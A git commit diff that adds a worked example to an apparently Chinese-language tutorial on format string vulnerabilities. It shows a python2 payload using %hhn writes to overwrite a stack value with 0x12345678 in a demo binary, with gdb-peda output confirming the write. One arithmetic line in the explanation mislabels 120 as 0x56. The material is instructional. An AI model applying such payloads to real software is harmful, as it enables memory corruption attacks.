fix
This commit is contained in:
parent
70fe3201a5
commit
f40c2a69c7
@ -1040,7 +1040,96 @@ gdb-peda$ x/4wb 0xffffd538
|
|||||||
```
|
```
|
||||||
把 `AAAA`、`BBBB`、`CCCC`、`DDDD` 占据的地址分别替换成括号中的值,再适当使用填充字节使 8 字节对齐就可以了。构造输入如下:
|
把 `AAAA`、`BBBB`、`CCCC`、`DDDD` 占据的地址分别替换成括号中的值,再适当使用填充字节使 8 字节对齐就可以了。构造输入如下:
|
||||||
```
|
```
|
||||||
|
$ python2 -c 'print("\x38\xd5\xff\xff"+"\x39\xd5\xff\xff"+"\x3a\xd5\xff\xff"+"\x3b\xd5\xff\xff"+"%104c%13$hhn"+"%222c%14$hhn"+"%222c%15$hhn"+"%222c%16$hhn")' > text
|
||||||
|
```
|
||||||
|
其中前四个部分是 4 个写入地址,占 4*4=16 字节,后面四个部分分别用于写入十六进制数,由于使用了 `hh`,所以只会保留一个字节 `0x78`(16+104=120 -> 0x56)、`0x56`(120+222=342 -> 0x0156 -> 56)、`0x34`(342+222=564 -> 0x0234 -> 0x34)、`0x12`(564+222=786 -> 0x312 -> 0x12)。执行结果如下:
|
||||||
|
```
|
||||||
|
$ gdb -q a.out
|
||||||
|
Reading symbols from a.out...(no debugging symbols found)...done.
|
||||||
|
gdb-peda$ b printf
|
||||||
|
Breakpoint 1 at 0x8048350
|
||||||
|
gdb-peda$ r < text
|
||||||
|
Starting program: /home/firmy/Desktop/RE4B/a.out < text
|
||||||
|
[----------------------------------registers-----------------------------------]
|
||||||
|
EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
|
||||||
|
EBX: 0x804a000 --> 0x8049f14 --> 0x1
|
||||||
|
ECX: 0x1
|
||||||
|
EDX: 0xf7f9883c --> 0x0
|
||||||
|
ESI: 0xf7f96e68 --> 0x1bad90
|
||||||
|
EDI: 0x0
|
||||||
|
EBP: 0xffffd5f8 --> 0x0
|
||||||
|
ESP: 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
|
||||||
|
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
|
||||||
|
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
|
||||||
|
[-------------------------------------code-------------------------------------]
|
||||||
|
0xf7e27c1b <fprintf+27>: ret
|
||||||
|
0xf7e27c1c: xchg ax,ax
|
||||||
|
0xf7e27c1e: xchg ax,ax
|
||||||
|
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
|
||||||
|
0xf7e27c25 <printf+5>: add eax,0x16f243
|
||||||
|
0xf7e27c2a <printf+10>: sub esp,0xc
|
||||||
|
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
|
||||||
|
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
|
||||||
|
No argument
|
||||||
|
[------------------------------------stack-------------------------------------]
|
||||||
|
0000| 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
|
||||||
|
0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
|
||||||
|
0008| 0xffffd534 --> 0x1
|
||||||
|
0012| 0xffffd538 --> 0x88888888
|
||||||
|
0016| 0xffffd53c --> 0xffffffff
|
||||||
|
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
|
||||||
|
0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
|
||||||
|
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
|
||||||
|
[------------------------------------------------------------------------------]
|
||||||
|
Legend: code, data, rodata, value
|
||||||
|
|
||||||
|
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
|
||||||
|
gdb-peda$ x/20x $esp
|
||||||
|
0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
|
||||||
|
0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
|
||||||
|
0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
|
||||||
|
0xffffd55c: 0x00004443 0x00000000 0xffffd538 0xffffd539
|
||||||
|
0xffffd56c: 0xffffd53a 0xffffd53b 0x34303125 0x33312563
|
||||||
|
gdb-peda$ finish
|
||||||
|
Run till exit from #0 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
|
||||||
|
[----------------------------------registers-----------------------------------]
|
||||||
|
EAX: 0x312
|
||||||
|
EBX: 0x804a000 --> 0x8049f14 --> 0x1
|
||||||
|
ECX: 0x0
|
||||||
|
EDX: 0xf7f98830 --> 0x0
|
||||||
|
ESI: 0xf7f96e68 --> 0x1bad90
|
||||||
|
EDI: 0x0
|
||||||
|
EBP: 0xffffd5f8 --> 0x0
|
||||||
|
ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
|
||||||
|
EIP: 0x8048520 (<main+138>: add esp,0x20)
|
||||||
|
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
|
||||||
|
[-------------------------------------code-------------------------------------]
|
||||||
|
0x8048514 <main+126>: lea eax,[ebp-0x94]
|
||||||
|
0x804851a <main+132>: push eax
|
||||||
|
0x804851b <main+133>: call 0x8048350 <printf@plt>
|
||||||
|
=> 0x8048520 <main+138>: add esp,0x20
|
||||||
|
0x8048523 <main+141>: sub esp,0xc
|
||||||
|
0x8048526 <main+144>: push 0xa
|
||||||
|
0x8048528 <main+146>: call 0x8048370 <putchar@plt>
|
||||||
|
0x804852d <main+151>: add esp,0x10
|
||||||
|
[------------------------------------stack-------------------------------------]
|
||||||
|
0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
|
||||||
|
0004| 0xffffd534 --> 0x1
|
||||||
|
0008| 0xffffd538 --> 0x12345678
|
||||||
|
0012| 0xffffd53c --> 0xffffffff
|
||||||
|
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
|
||||||
|
0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
|
||||||
|
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
|
||||||
|
0028| 0xffffd54c --> 0x80484b0 (<main+26>: add ebx,0x1b50)
|
||||||
|
[------------------------------------------------------------------------------]
|
||||||
|
Legend: code, data, rodata, value
|
||||||
|
0x08048520 in main ()
|
||||||
|
gdb-peda$ x/20x $esp
|
||||||
|
0xffffd530: 0xffffd564 0x00000001 0x12345678 0xffffffff
|
||||||
|
0xffffd540: 0xffffd55a 0xffffd564 0x080481fc 0x080484b0
|
||||||
|
0xffffd550: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
|
||||||
|
0xffffd560: 0x00000000 0xffffd538 0xffffd539 0xffffd53a
|
||||||
|
0xffffd570: 0xffffd53b 0x34303125 0x33312563 0x6e686824
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|